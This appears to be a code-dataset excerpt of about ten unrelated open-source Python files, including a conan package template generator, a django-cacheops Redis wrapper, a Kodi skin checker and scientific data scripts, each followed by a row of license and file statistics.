Ancestors will not contain front page and will contain object itself.
"""
ancestors = self.ancestors()
if self.front_paged_ancestors:
ancestors = ancestors[1:]
else:
ancestors = ancestors[:]
ancestors.append(self)
return ancestors
def children(self, lasy=False):
"""Returns children for object"""
if lasy:
field_name = '_children_lasy'
else:
field_name = '_children'
if hasattr(self, field_name):
return getattr(self, field_name)
children = []
for rule in self.rules[self.name].sequence:
point = rule.forward_point(self.object)
if rule.name == self.name:
children += [MenuItem(self.name, item) for item in get_children(
self.rules[self.name].proxy, self.object, lasy)
]
elif point is DoesNotDefined or point == self.object:
object = rule.forward_object(self.object)
if rule.method == 'insert' and not lasy:
children += [MenuItem(rule.name, object)]
elif rule.method == 'children':
children += [MenuItem(rule.name, item) for item in get_children(
rule.proxy, object, lasy)
]
setattr(self, field_name, children)
return children
| gpl-3.0 | 7,323,693,844,569,859,000 | 35.032727 | 124 | 0.598345 | false | 3.919699 | false | false | false |
oneraghavan/portcache | setup.py | 1 | 2150 | from setuptools import setup
setup(name='portcache',
version='0.3 ',
description='A simple cache for port from remote service',
url='https://github.com/oneraghavan/portcache',
author='Raghavan',
author_email='[email protected]',
license='MIT',
packages=['portcache'],
install_requires=[
'web.py', 'PyYAML' , 'requests'
],
zip_safe=False,
entry_points={
'console_scripts': ['portcache=portcache.command_line:main'],
})
print "___________________________________"
print "|@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |"
print "|@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |"
print "| Succesfully installed portcache |"
print "|@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |"
print "|@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |"
print "|_________________________________|"
print "\nportcache is a cache for remote calls . In microservices world, we have to work with lots of services which are needed to run our service and \n" \
"its a pain if the list of these service list grows big .portcache gives you the ability to point to a remote service instance and also cache \n" \
"the responses for you calls.\n\n" \
"To start : portcache <config yml file> \n\n" \
"The config file requires three params localport , remote , cache_file .\n" \
"localport - The port you want to run your cache service . you will point your dependent app/service to this port \n" \
"remote - The remote url with port that corresponds to the service you would like to cache \n" \
"cache_file - The location of the cache you want to save \n\n" \
"A sample config yml file looks like this \n\n" \
"localport: 9090 \n" \
"remote: http://myremoteserviceurl.com \n" \
"cache_file: \"/data/tmp/merch \n\n" \
"Starting with this config file, starts a server at port 9090.Whenever a request comes to the localhost:9090, it \n" \
"will check if this request has been already cached ,if yes then it will serve from cache file, else it will call \n" \
"the http://myremoteserviceurl.com with the request, cache and return the response"
| mit | 51,269,814,623,588,696 | 50.190476 | 156 | 0.596279 | false | 3.758741 | false | false | false |
phil65/KodiDevKit | script.py | 1 | 3245 | # -*- coding: utf8 -*-
# Copyright (C) 2017 - Philipp Temminghoff <[email protected]>
# This program is Free Software see LICENSE file for details
import os
import sys
import codecs
import logging
RESULTS_FILE = "results.txt"
settings = {"kodi_path": "C:/Kodi",
"portable_mode": True,
"language_folders": ["resource.language.en_gb", "English"]}
def check_tags(check_type):
"""
triggers of test of type "check_type", then formats and logs them
"""
errors = INFOS.get_check_listitems(check_type)
for e in errors:
logging.info(e["message"])
path = "/".join(e["file"].split(os.sep)[-2:])
logging.info("%s: line %s\n" % (path, e["line"]))
if __name__ == "__main__":
from libs import utils
from libs.infoprovider import InfoProvider
from libs import chardet
from libs.eol import eol
INFOS = InfoProvider()
open(RESULTS_FILE, 'w').close()
INFOS.load_settings(settings)
INFOS.load_data()
filehandler = logging.FileHandler("result.txt", mode="w")
formatter = logging.Formatter('%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
filehandler.setFormatter(formatter)
logger = logging.getLogger()
logger.addHandler(filehandler)
project_folder = sys.argv[1] if len(sys.argv) >= 2 else input("Enter Path to skin: ")
INFOS.init_addon(project_folder)
if len(sys.argv) < 3:
repo = input('Enter Kodi version (%s): ' % " / ".join([item["name"] for item in INFOS.addon.RELEASES]))
else:
repo = sys.argv[2]
INFOS.check_xml_files()
for path in INFOS.addon.get_xml_files():
if utils.check_bom(path):
logging.info("found BOM. File: " + path)
try:
with codecs.open(path, "rb", encoding='utf-8', errors="strict") as f:
text = f.read()
except Exception:
logging.info("Error when trying to read %s as UTF-8" % path)
with codecs.open(path, "rb", errors="ignore") as f:
rawdata = f.read()
encoding = chardet.detect(rawdata)
logging.info("detected encoding: %s" % encoding["encoding"])
with codecs.open(path, "rb", encoding=encoding["encoding"]) as f:
text = f.read()
result = eol.eol_info_from_path_patterns([project_folder],
recursive=True,
includes=[],
excludes=['.svn', '.git'])
for item in result:
if item[1] == '\n' or None:
continue
elif item[1] == '\r':
logging.info("MAC Line Endings detected in " + item[0])
else:
logging.info("Windows Line Endings detected in " + item[0])
logging.info("ADDON DEPENDENCY CHECK")
INFOS.check_dependencies()
logging.info("INCLUDE CHECK")
check_tags("include")
logging.info("VARIABLE CHECK")
check_tags("variable")
logging.info("FONT CHECK")
check_tags("font")
logging.info("LABEL CHECK")
check_tags("label")
logging.info("ID CHECK")
check_tags("id")
logging.info("CHECK FOR COMMON MISTAKES")
check_tags("general")
| gpl-3.0 | -1,780,904,815,994,852,400 | 35.460674 | 111 | 0.572265 | false | 3.747113 | false | false | false |
seecr/meresco-solr | meresco/solr/fields2solrdoc.py | 1 | 2921 | ## begin license ##
#
# "Meresco Solr" is a set of components and tools
# to integrate Solr into "Meresco."
#
# Copyright (C) 2011-2013 Seecr (Seek You Too B.V.) http://seecr.nl
# Copyright (C) 2012 SURF http://www.surf.nl
# Copyright (C) 2012-2013 Stichting Kennisnet http://www.kennisnet.nl
#
# This file is part of "Meresco Solr"
#
# "Meresco Solr" is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# "Meresco Solr" is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with "Meresco Solr"; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
## end license ##
from meresco.core import Observable
from xml.sax.saxutils import escape as escapeXml
from itertools import chain
class Fields2SolrDoc(Observable):
def __init__(self, transactionName, partname="solr", singularValueFields=None, isSingularValueField=None):
Observable.__init__(self)
self._transactionName = transactionName
self._partname = partname
if singularValueFields and isSingularValueField:
raise ValueError("Use either 'singularValueFields' or 'isSingularValueField'")
self._isSingularValueField = isSingularValueField
if singularValueFields:
singularValueFields = set(singularValueFields)
self._isSingularValueField = lambda name: name in singularValueFields
def begin(self, name):
if name != self._transactionName:
return
tx = self.ctx.tx
tx.join(self)
def addField(self, name, value):
tx = self.ctx.tx
valueList = tx.objectScope(self).setdefault(name, [])
if not self._isSingularValueField is None:
if len(valueList) == 1 and self._isSingularValueField(name):
return
valueList.append(value)
def commit(self, id):
tx = self.ctx.tx
fields = tx.objectScope(self)
if not fields:
return
recordIdentifier = tx.locals["id"]
specialFields = [
('__id__', recordIdentifier),
]
def fieldStatement(key, value):
return '<field name="%s">%s</field>' % (escapeXml(key), escapeXml(value))
allFields = ((k, v) for k, vs in fields.items() for v in vs)
xml = "<doc xmlns=''>%s</doc>" % ''.join(fieldStatement(*args) for args in chain(iter(specialFields), allFields))
yield self.all.add(identifier=recordIdentifier, partname=self._partname, data=xml)
| gpl-2.0 | 5,766,375,609,882,647,000 | 40.140845 | 121 | 0.6734 | false | 3.808344 | false | false | false |
lasote/conan | conans/client/cmd/new.py | 1 | 9249 | import re
from conans.errors import ConanException
from conans.model.ref import ConanFileReference
from conans.client.cmd.new_ci import ci_get_files
conanfile = """from conans import ConanFile, CMake, tools
class {package_name}Conan(ConanFile):
name = "{name}"
version = "{version}"
license = "<Put the package license here>"
url = "<Package recipe repository url here, for issues about the package>"
description = "<Description of {package_name} here>"
settings = "os", "compiler", "build_type", "arch"
options = {{"shared": [True, False]}}
default_options = "shared=False"
generators = "cmake"
def source(self):
self.run("git clone https://github.com/memsharded/hello.git")
self.run("cd hello && git checkout static_shared")
# This small hack might be useful to guarantee proper /MT /MD linkage in MSVC
# if the packaged project doesn't have variables to set it properly
tools.replace_in_file("hello/CMakeLists.txt", "PROJECT(MyHello)", '''PROJECT(MyHello)
include(${{CMAKE_BINARY_DIR}}/conanbuildinfo.cmake)
conan_basic_setup()''')
def build(self):
cmake = CMake(self)
cmake.configure(source_dir="%s/hello" % self.source_folder)
cmake.build()
# Explicit way:
# self.run('cmake %s/hello %s' % (self.source_folder, cmake.command_line))
# self.run("cmake --build . %s" % cmake.build_config)
def package(self):
self.copy("*.h", dst="include", src="hello")
self.copy("*hello.lib", dst="lib", keep_path=False)
self.copy("*.dll", dst="bin", keep_path=False)
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.dylib", dst="lib", keep_path=False)
self.copy("*.a", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = ["hello"]
"""
conanfile_bare = """from conans import ConanFile
from conans import tools
class {package_name}Conan(ConanFile):
name = "{name}"
version = "{version}"
settings = "os", "compiler", "build_type", "arch"
description = "<Description of {package_name} here>"
url = "None"
license = "None"
def package(self):
self.copy("*")
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
"""
conanfile_sources = """from conans import ConanFile, CMake
class {package_name}Conan(ConanFile):
name = "{name}"
version = "{version}"
license = "<Put the package license here>"
url = "<Package recipe repository url here, for issues about the package>"
description = "<Description of {package_name} here>"
settings = "os", "compiler", "build_type", "arch"
options = {{"shared": [True, False]}}
default_options = "shared=False"
generators = "cmake"
exports_sources = "src/*"
def build(self):
cmake = CMake(self)
cmake.configure(source_dir="%s/src" % self.source_folder)
cmake.build()
# Explicit way:
# self.run('cmake %s/src %s' % (self.source_folder, cmake.command_line))
# self.run("cmake --build . %s" % cmake.build_config)
def package(self):
self.copy("*.h", dst="include", src="src")
self.copy("*.lib", dst="lib", keep_path=False)
self.copy("*.dll", dst="bin", keep_path=False)
self.copy("*.dylib*", dst="lib", keep_path=False)
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.a", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = ["hello"]
"""
conanfile_header = """from conans import ConanFile, tools
import os
class {package_name}Conan(ConanFile):
name = "{name}"
version = "{version}"
license = "<Put the package license here>"
url = "<Package recipe repository url here, for issues about the package>"
description = "<Description of {package_name} here>"
# No settings/options are necessary, this is header only
def source(self):
'''retrieval of the source code here. Remember you can also put the code in the folder and
use exports instead of retrieving it with this source() method
'''
#self.run("git clone ...") or
#tools.download("url", "file.zip")
#tools.unzip("file.zip" )
def package(self):
self.copy("*.h", "include")
"""
test_conanfile = """from conans import ConanFile, CMake
import os
class {package_name}TestConan(ConanFile):
settings = "os", "compiler", "build_type", "arch"
generators = "cmake"
def build(self):
cmake = CMake(self)
# Current dir is "test_package/build/<build_id>" and CMakeLists.txt is in "test_package"
cmake.configure(source_dir=self.conanfile_directory, build_dir="./")
cmake.build()
def imports(self):
self.copy("*.dll", dst="bin", src="bin")
self.copy("*.dylib*", dst="bin", src="lib")
self.copy('*.so*', dst='bin', src='lib')
def test(self):
os.chdir("bin")
self.run(".%sexample" % os.sep)
"""
test_cmake = """project(PackageTest CXX)
cmake_minimum_required(VERSION 2.8.12)
include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)
conan_basic_setup()
add_executable(example example.cpp)
target_link_libraries(example ${CONAN_LIBS})
# CTest is a testing tool that can be used to test your project.
# enable_testing()
# add_test(NAME example
# WORKING_DIRECTORY ${CMAKE_BINARY_DIR}/bin
# COMMAND example)
"""
test_main = """#include <iostream>
#include "hello.h"
int main() {
hello();
}
"""
hello_h = """#pragma once
#ifdef WIN32
#define HELLO_EXPORT __declspec(dllexport)
#else
#define HELLO_EXPORT
#endif
HELLO_EXPORT void hello();
"""
hello_cpp = """#include <iostream>
#include "hello.h"
void hello(){
#ifdef NDEBUG
std::cout << "Hello World Release!" <<std::endl;
#else
std::cout << "Hello World Debug!" <<std::endl;
#endif
}
"""
cmake = """project(MyHello CXX)
cmake_minimum_required(VERSION 2.8)
include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)
conan_basic_setup()
add_library(hello hello.cpp)
"""
gitignore_template = """
*.pyc
test_package/build
"""
def cmd_new(ref, header=False, pure_c=False, test=False, exports_sources=False, bare=False,
visual_versions=None, linux_gcc_versions=None, linux_clang_versions=None, osx_clang_versions=None,
shared=None, upload_url=None, gitignore=None, gitlab_gcc_versions=None, gitlab_clang_versions=None):
try:
tokens = ref.split("@")
name, version = tokens[0].split("/")
if len(tokens) == 2:
user, channel = tokens[1].split("/")
else:
user, channel = "user", "channel"
pattern = re.compile('[\W_]+')
package_name = pattern.sub('', name).capitalize()
except ValueError:
raise ConanException("Bad parameter, please use full package name,"
"e.g: MyLib/1.2.3@user/testing")
# Validate it is a valid reference
ConanFileReference(name, version, user, channel)
if header and exports_sources:
raise ConanException("'header' and 'sources' are incompatible options")
if pure_c and (header or exports_sources):
raise ConanException("'pure_c' is incompatible with 'header' and 'sources'")
if bare and (header or exports_sources):
raise ConanException("'bare' is incompatible with 'header' and 'sources'")
if header:
files = {"conanfile.py": conanfile_header.format(name=name, version=version,
package_name=package_name)}
elif exports_sources:
files = {"conanfile.py": conanfile_sources.format(name=name, version=version,
package_name=package_name),
"src/hello.cpp": hello_cpp,
"src/hello.h": hello_h,
"src/CMakeLists.txt": cmake}
elif bare:
files = {"conanfile.py": conanfile_bare.format(name=name, version=version,
package_name=package_name)}
else:
files = {"conanfile.py": conanfile.format(name=name, version=version,
package_name=package_name)}
if pure_c:
config = "\n def configure(self):\n del self.settings.compiler.libcxx"
files["conanfile.py"] = files["conanfile.py"] + config
if test:
files["test_package/conanfile.py"] = test_conanfile.format(name=name, version=version,
user=user, channel=channel,
package_name=package_name)
files["test_package/CMakeLists.txt"] = test_cmake
files["test_package/example.cpp"] = test_main
if gitignore:
files[".gitignore"] = gitignore_template
files.update(ci_get_files(name, version, user, channel, visual_versions,
linux_gcc_versions, linux_clang_versions,
osx_clang_versions, shared, upload_url,
gitlab_gcc_versions, gitlab_clang_versions))
return files
| mit | -2,767,009,680,822,622,700 | 32.51087 | 112 | 0.601362 | false | 3.632757 | true | false | false |
grschafer/BejeweledBot | train/agent.py | 1 | 2406 | from pybrain.rl.agents.logging import LoggingAgent
from pybrain.rl.agents.learning import LearningAgent
from scipy import where
from random import choice
class BejeweledAgent(LearningAgent):
def getAction(self):
# get best action for every state observation
# overlay all action values for every state observation, pick best
LoggingAgent.getAction(self)
# for each color, get best action, then pick highest-value action
# among those actions
actions = []
values = []
# TODO: why are same values printed many times in a row here?
#print '========== in agent =========='
#print 'states:', [[i] for i in self.lastobs.flatten()]
for state in self.lastobs:
#print 'state:', state
actions.append(self.module.activate(state))
values.append(self.module.lastMaxActionValue)
#self.module.printState(state)
#print ' best:', actions[-1], 'value:', values[-1]
actionIdx = where(values == max(values))[0]
ch = choice(actionIdx)
self.lastaction = actions[ch]
self.bestState = self.lastobs[ch]
#print 'assigning reward to state', self.bestState
#print 'chosen action:', self.lastaction, 'value:', max(values)
# add a chance to pick a random other action
if self.learning:
self.lastaction = self.learner.explore(self.lastobs, self.lastaction)
#print 'after explorer:', self.lastaction
#print '============= end ============'
return self.lastaction
def giveReward(self, r):
"""Step 3: store observation, action and reward in the history dataset. """
# step 3: assume that state and action have been set
assert self.lastobs != None
assert self.lastaction != None
assert self.lastreward == None
self.lastreward = r
# store state, action and reward in dataset if logging is enabled
if self.logging:
# TODO: assigning reward to only best estimate for now
#for state in self.lastobs:
# TODO: assign reward to state correctly? NO because we're in
# the learner -- learning will be slower though, because of
# false positives for every obs
self.history.addSample(self.bestState, self.lastaction, self.lastreward)
| mit | 1,512,328,622,695,829,200 | 41.210526 | 88 | 0.618038 | false | 4.311828 | false | false | false |
annahs/atmos_research | LEO_calc_coating_from_meas_scat_amp_and_write_to_db.py | 1 | 3857 | import sys
import os
import datetime
import pickle
import numpy as np
import matplotlib.pyplot as plt
from pprint import pprint
import sqlite3
import calendar
from datetime import datetime
#id INTEGER PRIMARY KEY AUTOINCREMENT,
#sp2b_file TEXT,
#file_index INT,
#instr TEXT,
#instr_locn TEXT,
#particle_type TEXT,
#particle_dia FLOAT,
#unix_ts_utc FLOAT,
#actual_scat_amp FLOAT,
#actual_peak_pos INT,
#FF_scat_amp FLOAT,
#FF_peak_pos INT,
#FF_gauss_width FLOAT,
#zeroX_to_peak FLOAT,
#LF_scat_amp FLOAT,
#incand_amp FLOAT,
#lag_time_fit_to_incand FLOAT,
#LF_baseline_pct_diff FLOAT,
#rBC_mass_fg FLOAT,
#coat_thickness_nm FLOAT,
#coat_thickness_from_actual_scat_amp FLOAT
#UNIQUE (sp2b_file, file_index, instr)
#connect to database
conn = sqlite3.connect('C:/projects/dbs/SP2_data.db')
c = conn.cursor()
c2 = conn.cursor()
instrument = 'UBCSP2'
instrument_locn = 'WHI'
type_particle = 'incand'
start_date = '20110105'
end_date = '20120601'
lookup_file = 'C:/Users/Sarah Hanna/Documents/Data/WHI long term record/coatings/lookup_tables/coating_lookup_table_WHI_2012_UBCSP2-nc(2p26,1p26).lupckl'
rBC_density = 1.8
incand_sat = 3750
lookup = open(lookup_file, 'r')
lookup_table = pickle.load(lookup)
lookup.close()
c.execute('''SELECT * FROM SP2_coating_analysis''')
names = [description[0] for description in c.description]
pprint(names)
begin_data = calendar.timegm(datetime.strptime(start_date,'%Y%m%d').timetuple())
end_data = calendar.timegm(datetime.strptime(end_date,'%Y%m%d').timetuple())
def get_rBC_mass(incand_pk_ht, year):
if year == 2012:
rBC_mass = 0.003043*incand_pk_ht + 0.24826 #AD corrected linear calibration for UBCSP2 at WHI 2012
if year == 2010:
rBC_mass = 0.01081*incand_pk_ht - 0.32619 #AD corrected linear calibration for ECSP2 at WHI 2010
return rBC_mass
def get_coating_thickness(BC_VED,scat_amp,coating_lookup_table):
#get the coating thicknesses from the lookup table which is a dictionary of dictionaries, the 1st keyed with BC core size and the second being coating thicknesses keyed with calc scat amps
core_diameters = sorted(coating_lookup_table.keys())
prev_diameter = core_diameters[0]
for core_diameter in core_diameters:
if core_diameter > BC_VED:
core_dia_to_use = prev_diameter
break
prev_diameter = core_diameter
#now get the coating thickness for the scat_amp this is the coating thickness based on the raw scattering max
scattering_amps = sorted(coating_lookup_table[core_dia_to_use].keys())
prev_amp = scattering_amps[0]
for scattering_amp in scattering_amps:
if scat_amp < scattering_amp:
scat_amp_to_use = prev_amp
break
prev_amp = scattering_amp
scat_coating_thickness = coating_lookup_table[core_dia_to_use].get(scat_amp_to_use, np.nan) # returns value for the key, or none
return scat_coating_thickness
LOG_EVERY_N = 10000
i = 0
for row in c.execute('''SELECT incand_amp, LF_scat_amp, unix_ts_utc, sp2b_file, file_index, instr FROM SP2_coating_analysis
WHERE instr=? and instr_locn=? and particle_type=? and incand_amp<? and unix_ts_utc>=? and unix_ts_utc<?''',
(instrument,instrument_locn,type_particle,incand_sat,begin_data,end_data)):
incand_amp = row[0]
LF_amp = row[1]
event_time = datetime.utcfromtimestamp(row[2])
file = row[3]
index = row[4]
instrt = row[5]
rBC_mass = get_rBC_mass(incand_amp, event_time.year)
if rBC_mass >= 0.25:
rBC_VED = (((rBC_mass/(10**15*rBC_density))*6/3.14159)**(1/3.0))*10**7 #VED in nm with 10^15fg/g and 10^7nm/cm
coat_th = get_coating_thickness(rBC_VED,LF_amp,lookup_table)
else:
rBC_VED = None
coat_th = None
c2.execute('''UPDATE SP2_coating_analysis SET coat_thickness_from_actual_scat_amp=? WHERE sp2b_file=? and file_index=? and instr=?''', (coat_th, file,index,instrt))
i+=1
if (i % LOG_EVERY_N) == 0:
print 'record: ', i
conn.commit()
conn.close()
| mit | -3,604,193,547,735,604,000 | 29.611111 | 207 | 0.721027 | false | 2.674757 | false | false | false |
LPgenerator/django-cacheops | cacheops/redis.py | 1 | 3494 | from __future__ import absolute_import
import warnings
from contextlib import contextmanager
import six
from funcy import decorator, identity, memoize, LazyObject
import redis
from redis.sentinel import Sentinel
from .conf import settings
if settings.CACHEOPS_DEGRADE_ON_FAILURE:
@decorator
def handle_connection_failure(call):
try:
return call()
except redis.ConnectionError as e:
warnings.warn("The cacheops cache is unreachable! Error: %s" % e, RuntimeWarning)
except redis.TimeoutError as e:
warnings.warn("The cacheops cache timed out! Error: %s" % e, RuntimeWarning)
else:
handle_connection_failure = identity
LOCK_TIMEOUT = 60
class CacheopsRedis(redis.StrictRedis):
get = handle_connection_failure(redis.StrictRedis.get)
@contextmanager
def getting(self, key, lock=False):
if not lock:
yield self.get(key)
else:
locked = False
try:
data = self._get_or_lock(key)
locked = data is None
yield data
finally:
if locked:
self._release_lock(key)
@handle_connection_failure
def _get_or_lock(self, key):
self._lock = getattr(self, '_lock', self.register_script("""
local locked = redis.call('set', KEYS[1], 'LOCK', 'nx', 'ex', ARGV[1])
if locked then
redis.call('del', KEYS[2])
end
return locked
"""))
signal_key = key + ':signal'
while True:
data = self.get(key)
if data is None:
if self._lock(keys=[key, signal_key], args=[LOCK_TIMEOUT]):
return None
elif data != b'LOCK':
return data
# No data and not locked, wait
self.brpoplpush(signal_key, signal_key, timeout=LOCK_TIMEOUT)
@handle_connection_failure
def _release_lock(self, key):
self._unlock = getattr(self, '_unlock', self.register_script("""
if redis.call('get', KEYS[1]) == 'LOCK' then
redis.call('del', KEYS[1])
end
redis.call('lpush', KEYS[2], 1)
redis.call('expire', KEYS[2], 1)
"""))
signal_key = key + ':signal'
self._unlock(keys=[key, signal_key])
@LazyObject
def redis_client():
if settings.CACHEOPS_SENTINEL and isinstance(settings.CACHEOPS_SENTINEL, dict):
sentinel = Sentinel(
settings.CACHEOPS_SENTINEL['location'],
socket_timeout=settings.CACHEOPS_SENTINEL.get('socket_timeout')
)
return sentinel.master_for(
settings.CACHEOPS_SENTINEL['service_name'],
redis_class=CacheopsRedis,
db=settings.CACHEOPS_SENTINEL.get('db') or 0
)
# Allow client connection settings to be specified by a URL.
if isinstance(settings.CACHEOPS_REDIS, six.string_types):
return CacheopsRedis.from_url(settings.CACHEOPS_REDIS)
else:
return CacheopsRedis(**settings.CACHEOPS_REDIS)
### Lua script loader
import re
import os.path
STRIP_RE = re.compile(r'TOSTRIP.*/TOSTRIP', re.S)
@memoize
def load_script(name, strip=False):
filename = os.path.join(os.path.dirname(__file__), 'lua/%s.lua' % name)
with open(filename) as f:
code = f.read()
if strip:
code = STRIP_RE.sub('', code)
return redis_client.register_script(code)
| bsd-3-clause | -5,793,251,046,439,883,000 | 29.382609 | 93 | 0.591013 | false | 3.886541 | false | false | false |
rhhayward/podcast_generator | podcast_generator/PodcastCreator.py | 1 | 4935 | import urllib.request as urllib
from lxml import etree
import os
from os.path import basename
from urllib.parse import urlparse
### PodcastCreator is the class that
### takes a set of downloaders,
### sets their settings, takes
### their downloaded files and
### makes them into an rss file
### for use with podcast
### aggregators.
class PodcastCreator:
""" takes a list of files, creates an output xml file for use with podcatcher """
def __init__(self):
self.files = []
self.outputFile = ""
self.title = ""
self.link = ""
self.enclosureBaseUrl = ""
self.db = None
self.destFolder = None
self.maxCount = None
self.downloaders = []
os.chdir("/tmp")
### addDownloader takes a PodcastDownloader
### object, sets its dest folder and
### db, and adds it to the list of
### available downloaders.
def addDownloader(self, Downloader):
if not self.destFolder is None:
Downloader.setDestFolder(self.destFolder)
if not self.db is None:
Downloader.useDb(self.db)
self.downloaders.append(Downloader)
### getFiles iterates through all
### the available downloaders,
### set their maxCount to our
### maxCount, and decrement our
### maxCount by however many
### the downloader got.
def getFiles(self):
downloadedCount=0
for downloader in self.downloaders:
if(self.maxCount is not None and downloader.maxCount is None):
downloader.setMaxCount(self.maxCount)
count = downloader.getFiles()
downloadedCount += count
if(self.maxCount is not None):
self.maxCount -= count
return downloadedCount
### setMaxCount is an accessor function
### for the maxCount which regulates
### the number of files to download.
def setMaxCount(self, count):
self.maxCount = count;
### setDestFolder takes a destionation
### folder to move files to after
### they've been downloaded.
def setDestFolder(self, destFolder):
self.destFolder = destFolder
### useDb is an accessor function
### for the podcast database object.
def useDb(self, db):
self.db = db
### setLink is used in the rss file for
### the rss link tag.
def setLink(self, link):
self.link = link
### setEnclosureBaseUrl is where the
### files will be avilable for http
### download.
def setEnclosureBaseUrl(self, enclosureBaseUrl):
self.enclosureBaseUrl = enclosureBaseUrl
### setOutputXmlFile is the location
### where the rss file will be written.
def setOutputXmlFile(self, updatedOutputFile):
self.outputFile = updatedOutputFile
### setTitle sets the title of the rss
### file.
def setTitle(self, title):
self.title = title
### writeOutputFile generates the output
### xml file.
def writeOutputFile(self):
self.podcasts = self.db.getPodcastsFromDb()
fh = open(self.outputFile, "wb")
rss = etree.Element("rss")
channel = etree.SubElement(rss, "channel")
etree.SubElement(channel, "title").text = self.title
etree.SubElement(channel, "description").text = self.title
etree.SubElement(channel, "link").text = self.link
etree.SubElement(channel, "language").text = "en-us"
etree.SubElement(channel, "copyright").text = "Copyright 2999"
for podcast in self.podcasts:
file = podcast.getFileName()
pubDate = podcast.getDate()
item = etree.SubElement(channel, "item")
etree.SubElement(item, "enclosure").set("url", self.enclosureBaseUrl + urllib.quote(file))
etree.SubElement(item, "category").text = "Podcasts"
etree.SubElement(item, "pubDate").text = pubDate
etree.SubElement(item, "guid").text = self.enclosureBaseUrl + urllib.quote(file)
titleAdded = False
for field in podcast.getAdditionalFields():
if field['fieldName'] == "title":
titleAdded = True
etree.SubElement(item, field['fieldName']).text = field['fieldValue']
if titleAdded == False:
etree.SubElement(item, "title").text = file
fh.write(etree.tostring(rss, encoding='UTF-8', xml_declaration=True, pretty_print=True))
fh.close()
### cleanupFiles takes a number of days before
### today to remove files from the fs and db
### Returns count of files removeD
def cleanupFiles(self, count):
files = self.db.cleanupFiles(count)
for file in files:
try:
os.unlink(self.destFolder+file)
except:
"there was a problem removing file " + self.destFolder+file
| gpl-3.0 | 4,101,729,319,851,635,700 | 34.25 | 102 | 0.61459 | false | 4.122807 | false | false | false |
cefn/firmware-codesign-readinglog | ui/index.py | 1 | 2487 | #!/usr/bin/python
import sys,os,glob,urlparse,urllib,subprocess
def setcwd():
realpath = os.path.realpath(sys.argv[0])
dname = os.path.dirname(realpath)
os.chdir(dname)
# sets working directory based on path to index.py
setcwd()
# loads local python modules, relative to index.py
sys.path.append(os.path.realpath('py'))
from logx import Viewer,Editor,debug_trace
'''
from PyQt5 import uic
from PyQt5.QtWidgets import QApplication
'''
from PyQt4 import uic
from PyQt4.QtGui import QApplication
from PyQt4.QtCore import QObject,pyqtSlot
notesdir = "../notes"
pdfdir = "../papers"
startquery = "./xq/index.xq"
class PdfAdaptor(QObject):
@pyqtSlot(str)
def loadid(self, pdfid):
pdfid = str(pdfid)
pdfpath = pdfdir + os.sep + pdfid + '.pdf'
self.loadpdf(pdfpath)
@pyqtSlot(str)
def loadpdf(self, pdfpath):
pdfpath = str(pdfpath)
pdfpath = os.path.realpath(pdfpath)
subprocess.Popen(['xdg-open', pdfpath])
def path2url(path):
return urlparse.urljoin(
'file:', urllib.pathname2url(path))
def main(argv):
querypath = os.path.realpath(startquery)
sourcedir = os.path.realpath(notesdir)
sourcepaths = glob.glob(sourcedir + "/*.html")
# for PyQt4
sourceurls = ",".join([("file://" + path) for path in sourcepaths])
# for PyQt5
#sourceurls = ",".join([path2url(path) for path in sourcepaths])
xquerynames = [
['sourceurls', sourceurls,'http://cefn.com/logx']
]
javascriptnames = dict()
# create application context
app = QApplication(sys.argv)
ui = uic.loadUi('index.ui')
editor = Editor(focuspath=None,view=ui.editView,javascriptnames=javascriptnames,xquerynames=xquerynames)
viewer = Viewer(querypath=querypath,view=ui.navView,javascriptnames=javascriptnames,xquerynames=xquerynames)
pdf = PdfAdaptor()
javascriptnames['editor']=editor
javascriptnames['viewer']=viewer
javascriptnames['pdf']=pdf
# subscribe viewer to refresh whenever source files refresh
# implicitly bound through 'sourcepaths' xquery name
for sourcepath in sourcepaths:
viewer.registersource(sourcepath)
ui.show()
# edit a notes file, if specified
if len(argv) > 0:
editor.focuspath = os.path.realpath(argv[0])
# load the view
viewer.render()
sys.exit(app.exec_())
if __name__ == "__main__":
main(sys.argv[1:]) | mit | -1,832,972,551,694,617,600 | 24.916667 | 112 | 0.657821 | false | 3.522663 | false | false | false |
jason-neal/spectrum_overload | spectrum_overload/differential.py | 1 | 1536 | # -*- coding: utf-8 -*-
"""Differential Class which takes the difference between two spectra."""
from typing import Any, Dict, Optional
from spectrum_overload.spectrum import Spectrum
# TODO: Add in s-profile from
# Ferluga 1997: Separating the spectra of binary stars-I. A simple method: Secondary reconstruction
class DifferentialSpectrum(object):
"""A differential spectrum."""
def __init__(self, Spectrum1: Spectrum, Spectrum2: Spectrum) -> None:
"""Initialise class with both spectra."""
if not (Spectrum1.calibrated and Spectrum2.calibrated):
raise ValueError("Input spectra are not calibrated.")
self.spec1 = Spectrum1
self.spec2 = Spectrum2
self.params = None # type: Optional[Dict[str, Any]]
def barycentric_correct(self):
"""Barycentric correct each spectra."""
pass
def rest_frame(self, frame):
"""Change rest frame to one of the spectra."""
pass
def diff(self):
"""Calculate difference between the two spectra."""
# TODO: Access interpolations
return self.spec1 - self.spec2
def sort(self, method: str = "time"):
"""Sort spectra in specific order. e.g. time, reversed."""
pass
def swap(self):
"""Swap order of the two spectra."""
self.spec1, self.spec2 = self.spec2, self.spec1
def add_orbital_params(self, params: Dict[str, Any]):
"""A dictionary of orbital parameters to use for shifting frames."""
self.params = params
| mit | 1,857,235,720,947,687,000 | 31.680851 | 99 | 0.646484 | false | 3.938462 | false | false | false |
